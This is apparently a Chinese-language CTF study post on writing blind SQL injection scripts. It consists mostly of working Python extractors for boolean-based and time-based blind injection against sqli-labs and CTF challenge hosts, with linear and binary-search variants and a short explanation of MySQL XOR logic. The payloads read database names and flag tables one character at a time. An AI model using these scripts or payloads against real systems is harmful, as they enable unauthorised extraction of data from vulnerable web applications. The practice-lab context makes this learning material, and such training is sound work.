SQL注入脚本编写
穷举
1.bool盲注脚本(post型)
import requests
url = "http://127.0.0.1/sqli-labs-master/Less-15/"
result =""
for i in range(1,10):
for j in range(65,150):
payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j)
payload2 = "admin'^(ascii(mid(database()from {}))>{})^1%23".format(i,j)
data = {"uname":payload1,"passwd":"123"}
r = requests.post(url,data=data)
if "slap.jpg" in r.text:
result += chr(j)
print (result)
break
用到了位运算符 (^)
原理:
我们高中学过的数学逻辑里,异或就是一种逻辑运算,规则概括起来是:两个条件相同(同真或同假)结果为假(0),两个条件不同结果为真(1);NULL 与任何条件做异或结果都是 NULL——NULL 表示"未知",未知值参与运算结果仍然未知,所以它既不是真也不是假,不能当作 0 或 1 来推断。
MySQL 里异或运算符为 `^`(按位异或,对 0/1 的布尔结果同样适用)或者 `xor`(逻辑异或)。
下面我在本地的环境测试一下
两个同为真的条件做异或,结果为假
两个同为假的条件做异或,结果为假
一个条件为真,一个条件为假,结果为真
null与所有条件做异或结果都为null
2.bool盲注脚本(同样是 post 型,注入点在登录表单的 username 字段)
import requests
import string
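# Candidate characters, tried in this order for every flag position.
str1 = '1234567890' + string.ascii_letters + string.punctuation
url = "http://a92ea67c-bde8-4b3c-9049-a486d2ff191d.chall.ctf.show/"
# Substring present in the response only when the injected condition was true.
SUCCESS_MARKER = 'ctfshow'
# Upper bound on flag length; the scan stops earlier once no candidate matches.
MAX_LEN = 87
# Per-request timeout in seconds; without one a stalled target hangs the scan.
TIMEOUT = 10


def build_payload(pos: int, ch: str) -> str:
    """Username value that makes the query true only when flag[pos] == ch.

    Compares ascii() values instead of quoting ``ch`` into the SQL: candidates
    from string.punctuation such as ``'`` and ``\\`` would otherwise break the
    query, and MySQL's default case-insensitive collations would make
    ``= 'a'`` also match ``A``, corrupting the recovered flag.
    """
    return "0' or (if(ascii(substr((select flag from web2.flag),{},1))={},1,0))#".format(pos, ord(ch))


def recover_char(oracle, charset: str = str1) -> str:
    """Return the first candidate for which ``oracle(ch)`` is True, or ''."""
    for ch in charset:
        if oracle(ch):
            return ch
    return ''


def probe(session, pos: int, ch: str) -> bool:
    """One request: does flag[pos] equal ch?"""
    data = {'username': build_payload(pos, ch), 'password': 'admin'}
    return SUCCESS_MARKER in session.post(url, data=data, timeout=TIMEOUT).text


def main() -> None:
    """Recover the flag one character at a time, printing progress."""
    flag = ''
    with requests.Session() as session:
        for pos in range(1, MAX_LEN + 1):
            ch = recover_char(lambda c: probe(session, pos, c))
            # No candidate matched: end of the flag (or a character outside str1).
            if not ch:
                break
            flag += ch
            print(flag)
    print("flag:", flag)


if __name__ == "__main__":
    main()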
3.时间盲注
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+"
result = ''
for i in range(1,10):
for j in range(23,127):
payload = url.format(str(i),str(j))
time1 = time.time()
r = requests.get(payload)
time2 = time.time()
time3 = time2 - time1
if time3 > 4:
result += chr(j)
print (result)
break
二分法
这是在网上找的一个大佬写的脚本
环境:[CISCN2019 华北赛区 Day2 Web1]Hack World
我也不知道为什么我的电脑跑不出来。可能这就是菜鸡和大佬的区别吧
import requests
url = "http://d849db01-ae4b-4faa-a7e0-3ede26de2b4f.node3.buuoj.cn/index.php"
result = ""
for i in range(1,100):
min_value = 33
max_value = 130
mid = (min_value+max_value)//2 #中值
while(min_value<max_value):
payload ={"id" : "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)}
html = requests.post(url,data=payload)
print(payload)
if "Hello, glzjin wants a girlfriend." in html.text:
#ascii值比mid值大
min_value = mid+1
else:
max_value = mid
mid = (min_value+max_value)//2
#找不到目标元素时停止
if(chr(mid)==" "):
break
result += chr(mid)
print(result)
print("fina flag:",result)
下面这个是我师兄的
非常平滑,好好学习
import requests
url="http://783dfdd8-9d2e-4e68-b3df-e1b718d4a572.chall.ctf.show/"
flag=''
for i in range(1,50):
f1=flag
top=127
low=33
while low<=top:#向下整除
mid=(top+low)//2
data={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))>{},1,0)#".format(str(i),str(mid)),'password':'admin'}
data1={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))={},1,0)#".format(str(i),str(mid)),'password':'admin'}
try:
r1=requests.post(url,data=data1)
print(i,mid)
if 'ctfshow' in r1.text:
flag+=chr(mid)
print(flag)
break
r=requests.post(url,data=data)
if 'ctfshow' in r.text:
low=mid+1
else:
top=mid-1
except Exception as e:
pass
if flag==f1:
break